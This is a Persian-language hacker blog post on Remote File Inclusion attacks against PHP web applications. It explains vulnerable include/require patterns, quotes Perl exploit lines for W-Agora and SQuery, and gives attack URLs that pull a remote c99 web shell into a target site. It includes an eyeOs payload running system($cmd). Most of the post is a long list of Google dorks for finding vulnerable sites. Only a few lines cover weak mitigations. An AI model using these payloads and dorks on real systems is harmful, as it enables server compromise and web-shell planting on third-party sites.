تبليغاتX
Great King Cyrus





 


             Home
             Contact
             Archive

 

Topics


 

Archive


 Banner


 ! Remote File Inclusion !

درود به همه دوستان عزیز میخوام در این پست در مورد حملات RFI برای شما شرح بدم . ببینید دوستان شما برای پیدا کردن این نوع باگها باید به زبان برنامه نویسی PHP آشنایی داشته باشید ( قابل توجه دوست عزیزی که میگفت یاد گیری زبان PHP به چه دردی میخوره ) اما بدون آشنایی به این زبان هم میتونید این نوع باگها رو پیدا کنید .

ابتدا شما رو با توابع Includer & Requier آشنا میکنم :

 

  require_once($evo_root."/evocore/_item.funcs.php");            lol

include_once($Paths['extensions_path']."hooks/pre_editor_wysi.php");                        lol

include($baghali."doc/snake.php");              lol

require($evo_root."/evocore/_item.funcs.php");                       lol

 

از اولی شروع میکنیم :

require_once($evo_root."/evocore/_item.funcs.php");

این کد تابع Require هستش که به وسیله متغیر evo_root صفحه item.funcs.php _ صفحه رو فراخونی میکنه .

حالا به این کد نگاه کنید :

// If no section was specified, use the default one

if (!isset($s)) $s = $setrow['defsec'];

$sectionresult = $db->query("SELECT * FROM `{$settings['tpre']}sections`

WHERE id='$s'");

$sectionrow = $db->fetch_assoc($sectionresult);

if ($sectionrow['id'] == '') {

// Ouput an error if the section could not be found

$content = 'There was an error retrieving the section details.';

eval('$content = "'.out_temp('content_error').'";');

require ('./footer.php');

 

فرض کنید این کد ها  توی صفحه به نام Snake.php ذخیره شده باشن صفحه Snake.php  از بالا شروع به اجرای کد ها میکنه و وقتی به قسمت قرمز رنگ میرسه تمام محتویات صفحه footer.php رو در پایین خودش ( یعنی در پایین صفحه Snake.php ) نشون میده و به عبارت دیگه فراخونی میکنه !

حالا به نظر شما اگه به جای :

require ('./footer.php');

نوشته بود :

require ('$somename./footer.php');

چی میشد ؟

اگه اینجا برای فراخونی صفحه footer.php تز یک متغیر استفاده کرده بود اونوقت Snake.php میتونست هر صفحه دیگه ای رو در پایین خودش فراخونی کنه !

این یعنی :

اگه کد اینطوری باشه ما میتونیم در صفحه Snake.php به جای footer.php صفحه شل اسکریپت خودمون رو فراخونی کنیم ! D:  به این صورت :

Snake.php?somename=[shell script page]     lol

خب اینجا Snake.php همون صفحه ای هستش که کد هاش مشکل داشته و somename هم همون متغیری هستش که نباید تعریف میشده ولی شده ( البته گاهی لازمه که برای Include از متغیر استفاده بشه که اونم راه داره ) Shell Script Page که فکر کنم با c99 هم آشنایی دارید .

خب : توابع :

require_once

include_once

include

require

همشون میان و صفحاتی که درونشون تعریف شده رو فراخونی میکنند :

require_once($evo_root."/evocore/_item.funcs.php");

include_once($Paths['extensions_path']."hooks/pre_editor_wysi.php");

include($baghali."doc/snake.php");

require($evo_root."/evocore/_item.funcs.php");

اولی به وسیله متغیر evo_root صفحه item.funcs.php_ رو فراخونی میکنه

دومی به وسیله متغیر  Paths ['extensions_path'[  صفحه pre_editor_wysi.php رو فراخونی میکنه !

بقیه هم به این ترتیب .

خب حالا چند تا کد آسیب پذیر که اکسپل شدن :

W-Agora <= 4.2.0 (inc_dir) Remote File Inclusion Exploit

HTTP::Request->new(GET =>$Path.'

forgot_password.php?inc_dir='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould

Not connect\n"

خب آبی یعنی آسیب پذیری در یک متغیر به نام inc_dir بوده بعضی وقتا هم اسم صفحه آسیب پذیر رو مینویسند D:

کد آسیب پذیر هم اینه :

include($inc_dir." /forgot_password.php ");

که به صورت کامل این میشه :

http://site.com/[W-Agora path]/forgot_password.php?inc_dir=[urhost.com/c99.txt?]

شل میتونه هر چی باشه دلیل نداره حتما c99 باشه !

این هم برای پرتال : SQuery :

SQuery <= 4.5 Remote File Inclusion Exploit

HTTP::Request->new(GET

=>$Path.'lib/armygame.php?libpath='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die

"\nCould Not connect\n";

 

متغیر آسیب پذیر  : libpath

صفحه آسیب پذیر : armygame.php

اکسپل :

http://site.com/[ SQuery path]/lib/armygame.php?libpath=[urhost.com/c99.txt?]

در توابع . آرایه ها . کلاس ها . و جایی که برای Include شرط تعیین کرده باشن نمیشه RFI گرفت برای همین میگم باید به PHP آشنا باشید .

اگه اینطوری دیدید بیخیال شید چون نمیشه :

/* PAR DEFAUT */

$cfg_racine = "../";

require($cfg_racine."inc/vars.php");

require($cfg_racine."inc/config.php");

require($cfg_racine."inc/fonctions.php");

require($cfg_racine."inc/mysql.php");

require($cfg_racine."inc/membres.php");

require($cfg_racine."inc/affichage.php");

require($cfg_racine."inc/textes.php");

$mysql = new mysql;

$membre = new membre;

?>

اینجا برنامه نویس با یک متغیر ۸ صفحه رو فراخونی کرده و صفحه شل شما در اولی قرار میگیره بعد دومی میاد Config.php رو صدا میزنه شل شما پر میشه !!!

این یک تابع هستش پس RFI بی RFI :

function hpage($titre = "") {

global $cfg_titre, $cfg_modules, $cfg_f, $raccourcis, $mysql;

include($GLOBALS["cfg_racine"]."inc/affichage/hpage.php");}

چون ذر اینجا صفحه میاد متغیرها رو

cfg_titre, $cfg_modules, $cfg_f, $raccourcis, $mysql

اینا رو تعریف کرده که حالا میخواد که از خارج از تابع بیارتشون تو با global

اینم مثال آرایه :

$CONF = array();

include('./config.php'); // common functions

include_once($DIR_LIBS . 'ACTION.php');

$action = requestVar('action');

$a =& new ACTION();

$errorInfo = $a->doAction($action);

if ($errorInfo)

{

doError($errorInfo['message'], new SKIN($errorInfo['skinid']));

اگه باگ روی پرتال سایتی یا سایت خودتون دیدید این کد رو بالای صفحه آسیب پذیر کپی کنید بعدشم این کد رو بالای صفحه آسیب پذیر کپی کنید :

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

یا اینکه :

defined( '_VALID_MOS' ) or die( 'you want to hack my site?Hahah!!Get l0st ,N0w.' );

اما امنیت در این مورد :

از درون سرور و فایل php.ini دسترسی به فایلها رو از روی یک سرور دیگه یا سایت دیگه رو غیر فعال میکنم :

allow_url_fopen= off

این کار رو کسی میتونه انجام بده که به سرور دسترسی کامل داره .

روش دیگه اینه که : که با استفاده از یک کد اون فایل یا باگ رو پتچ کنیم .

کد : defined('_VALID_MOS') or die ( 'Security By ...')   lol

با این کد فایل باز نمیشه و ممکنه سایت به مشکل بخوره

اما روش دیگه اینه که با فیلتر گذاری از اجرا و بار گذاری جلوگیری کنیم .

منبع : مقاله شهریار جلایری .

اینم یک مقاله از Dj7xpl در مورد RFI

دانلود

اینا هم Dorks برای RFI :

 inurl:/modules/My_eGallery/public/displayCategory.php?basepath=

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/include/new-visitor.inc.php?lvc_include_dir=

inurl:/_functions.php?prefix=

inurl:/cpcommerce/_functions.php?prefix=

inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/ashnews.php?pathtoashnews=

inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=

inurl:/pm/lib.inc.php?pm_path=

inurl:/b2-tools/gm-2-b2.php?b2inc=

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/includes/include_once.php?include_file=

inurl:/e107/e107_handlers/secure_img_render.php?p=

inurl:/shoutbox/expanded.php?conf=

inurl:/main.php?x=

inurl:/myPHPCalendar/admin.php?cal_dir=

inurl:/index.php/main.php?x=

inurl:/index.php?include=

inurl:/index.php?x=

inurl:/index.php?open=

inurl:/index.php?visualizar=

inurl:/template.php?pagina=

inurl:/index.php?pagina=

inurl:/index.php?inc=

inurl:/includes/include_onde.php?include_file=

inurl:/index.php?page=

inurl:/index.php?pg=

inurl:/index.php?show=

inurl:/index.php?cat=

inurl:/index.php?file=

inurl:/db.php?path_local=

inurl:/index.php?site=

inurl:/htmltonuke.php?filnavn=

inurl:/livehelp/inc/pipe.php?HCL_path=

inurl:/hcl/inc/pipe.php?HCL_path=

inurl:/inc/pipe.php?HCL_path=

inurl:/support/faq/inc/pipe.php?HCL_path=

inurl:/help/faq/inc/pipe.php?HCL_path=

inurl:/helpcenter/inc/pipe.php?HCL_path=

inurl:/live-support/inc/pipe.php?HCL_path=

inurl:/gnu3/index.php?doc=

inurl:/gnu/index.php?doc=

inurl:/phpgwapi/setup/tables_update.inc.php?appdir=

inurl:/forum/install.php?phpbb_root_dir=

inurl:/includes/calendar.php?phpc_root_path=

inurl:/includes/setup.php?phpc_root_path=

inurl:/inc/authform.inc.php?path_pre=

inurl:/include/authform.inc.php?path_pre=

inurl:index.php?nic=

inurl:index.php?sec=

inurl:index.php?content=

inurl:index.php?link=

inurl:index.php?filename=

inurl:index.php?dir=

inurl:index.php?document=

inurl:index.php?view=

inurl:*.php?sel=

inurl:*.php?session=&content=

inurl:*.php?locate=

inurl:*.php?place=

inurl:*.php?layout=

inurl:*.php?go=

inurl:*.php?catch=

inurl:*.php?mode=

inurl:*.php?name=

inurl:*.php?loc=

inurl:*.php?f=

inurl:*.php?inf=

inurl:*.php?pg=

inurl:*.php?load=

inurl:*.php?naam=

allinurl:/index.php?page= site:*.dk

allinurl:/index.php?file= site:*.dk

INURL OR ALLINURL WITH:

/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=

/includes/header.php?systempath=

/Gallery/displayCategory.php?basepath=

/index.inc.php?PATH_Includes=

/ashnews.php?pathtoashnews=

/ashheadlines.php?pathtoashnews=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/demo/includes/init.php?user_inc=

/jaf/index.php?show=

/inc/shows.inc.php?cutepath=

/poll/admin/common.inc.php?base_path=

/pollvote/pollvote.php?pollname=

/sources/post.php?fil_config=

/modules/My_eGallery/public/displayCategory.php?basepath=

/bb_lib/checkdb.inc.php?libpach=

/include/livre_include.php?no_connect=lol&chem_absolu=

/index.php?from_market=Y&pageurl=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/pivot/modules/module_db.php?pivot_path=

/modules/4nAlbum/public/displayCategory.php?basepath=

/derniers_commentaires.php?rep=

/modules/coppermine/themes/default/theme.php?THEME_DIR=

/modules/coppermine/include/init.inc.php?CPG_M_DIR=

/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=

/coppermine/themes/maze/theme.php?THEME_DIR=

/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=

/myPHPCalendar/admin.php?cal_dir=

/agendax/addevent.inc.php?agendax_path=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=

/main.php?page=

/default.php?page=

/index.php?action=

/index1.php?p=

/index2.php?x=

/index2.php?content=

/index.php?conteudo=

/index.php?cat=

/include/new-visitor.inc.php?lvc_include_dir=

/modules/agendax/addevent.inc.php?agendax_path=

/shoutbox/expanded.php?conf=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/pivot/modules/module_db.php?pivot_path=

/library/editor/editor.php?root=

/library/lib.php?root=

/e107/e107_handlers/secure_img_render.php?p=

/zentrack/index.php?configFile=

/main.php?x=

/becommunity/community/index.php?pageurl=

/GradeMap/index.php?page=

/index4.php?body=

/side/index.php?side=

/main.php?page=

/es/index.php?action=

/index.php?sec=

/index.php?main=

/index.php?sec=

/index.php?menu=

/html/page.php?page=

/page.php?view=

/index.php?menu=

/main.php?view=

/index.php?page=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/index.php?show=

/tutorials/print.php?page=

/index.php?page=

/index.php?level=

/index.php?file=

/index.php?inter_url=

/index.php?page=

/index2.php?menu=

/index.php?level=

/index1.php?main=

/index1.php?nav=

/index1.php?link=

/index2.php?page=

/index.php?myContent=

/index.php?TWC=

/index.php?sec=

/index1.php?main=

/index2.php?page=

/index.php?babInstallPath=

/main.php?body=

/index.php?z=

/main.php?view=

/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

/index.php?file=

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=


1. allinurl:my_egallery site:.org
/modules/My_eGallery/public/displayCategory.php?basepath=

2. allinurl:xgallery site:.org
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

3. allinurl:coppermine site:.org
/modules/coppermine/themes/default/theme.php?THEME_DIR=

4. allinurl:4nAlbum site:.org
/modules/4nAlbum/public/displayCategory.php?basepath=

5. allinurlP:NphpBB2 site:.org
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

6. allinurl:ihm.php?p=

7. Keyword : "powered by AllMyLinks"
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

8. allinurl:/modules.php?name=allmyguests
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

9. allinurl:/Popper/index.php?
/Popper/index.php?childwindow.inc.php?form=

10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
yahoo = by Kietu? v 3.2
/kietu/index.php?kietu[url_hit]=

11. keyword : "Powered by phpBB 2.0.6"
/html&highlight=%2527.include($_GET[a]),exit.%2527&a=

12. keyword : "powered by CubeCart 3.0.6"
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

13. keyword : "powered by paBugs 2.0 Beta 3"
/class.mysql.php?path_to_bt_dir=

14. allinurl:"powered by AshNews", allinurl:AshNews atau allinurl: /ashnews.php
/ashnews.php?pathtoashnews=

15. keyword : /phorum/login.php
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

16. allinurl:ihm.php?p=*

14. keyword : "powered eyeOs"
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id
diganti dengan :
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d);&a=

15. allinurl:.php?bodyfile=

16. allinurl:/includes/orderSuccess.inc.php?glob=
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

17. allinurl:forums.html
/modules.php?name=

18. allinurl:/default.php?page=home

19. allinurl:/folder.php?id=

20. allinurl:main.php?pagina=
/paginedinamiche/main.php?pagina=

21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by AllMyGuests")
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

22. allinurl:application.php?base_path=
/application.php?base_path=

23. allinurlp:hplivehelper
/phplivehelper/initiate.php?abs_path=

24. allinurlp:hpnuke
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

25. key word : "powered by Fantastic News v2.1.2"
/archive.php?CONFIG[script_path]=

26. keyword: "powered by smartblog" AND inurl:?page=login
/index.php?page=

27. allinurl:/forum/
/forum/admin/index.php?inc_conf=

28. keyword:"Powered By FusionPHP"
/templates/headline_temp.php?nst_inc=

29. allinurl:shoutbox/expanded.php filetypep:hp
/shoutbox/expanded.php?conf=

30. allinurl: /osticket/
/osticket/include/main.php?config[search_disp]=true&include_dir=

31. keyword : "Powered by iUser"
/common.php?include_path=

32. allinurl: "static.php?load="
/static.php?load=

33. keyworld : /phpcoin/login.php
/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=

34. keyworld: allinurl:/phpGedview/login.php site:
/help_text_vars.php?dir&PGV_BASE_DIRECTORY=

35. allinurl:/folder.php?id=
/classes.php?LOCAL_PATH=

inurl:"/lire.php?rub="

inurl:"/os/pointer.php?url="

inurl:"folder.php?id="

inurl:"show.php?page="

inurl:"index2.php?DoAction="

inurl:"index.php?canal="

inurl:"index.php?screen="

inurl:"index.php?langc="

inurl:"index.php?Language="

inurl:"view.php?page="

dork: "powered by doodle cart"
rfi of this dork: enc/content.php?Home_Path=

dork: "Login to Calendar"
rfi of this dork: /embed/day.php?path=

dork: "powered by EQdkp"
rfi of this dork: /includes/dbal.php?eqdkp_root_path=

inurl:"template.php?goto="

inurl:"video.php?content="

inurl:"pages.php?page="

inurl:"index1.php?choix="

inurl:"index1.php?menu="

inurl:"index2.php?ascii_seite="

dork: inurl:surveys
rfi to this dork: /surveys/survey.inc.php?path=

inurl:"index.php?body="

dork: allinurl:adobt sitel
rfi to this dork: /classes/adodbt/sql.php?classes_dir=

dork: "Powered By ScozNews"
rfi to this dork: /sources/functions.php?CONFIG[main_path]=
rfi to this dork: /sources/template.php?CONFIG[main_path]=

inurl:"kb_constants.php?module_root_path="

dork: allinurl:"mcf.php"
rfi to this dork: /mcf.php?content=

dork: inurl:"main.php?sayfa="
rfi to this dork: /main.php?sayfa=

dork: "MobilePublisherPHP"
rfi to this dork: /header.php?abspath=

dork: "powered by phpCOIN 1.2.3"
rfi to rhis dork: /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=

allinurl:login.php?dir=

inurl:"index.php?go="

inurl:"index1.php?="

inurl:"lib/gore.php?libpath="

inurl:"index2.php?p="

 

!!! FEEL S3CURITY HERE !!!



       LordKourosh

 



 

 

Search Engine



In Internet
In Lordkourosh.tk

 


Powered By
Lordkourosh


iRcHaTaN Security Forum

!!! Phishing !!!
!!! HiJacking !!!
!!! iRcHaTaN ToolKit Version 1.0 !!!
Confronting With DDOS
VOIP
SSL
! Remote File Inclusion !
! IIS & ASP !
!!! Ashampoo Firewall !!!
! Crack Perfect Keyloger By : Mafia !
مقاله ای در مورد شبکه اختصاصی و مجازی (VPN)
!!! Deactive Yahoo Account !!!
Connect Back
Server Security
SQL Injection tool = Done
آموزش ساخت اکانت FTP
هک کردن سرور !!!
تشخیص نوع سرور
HTML
Ashampoo.Firewall

iRcHaTaN Security Forum

Template Designed By : LordKourosh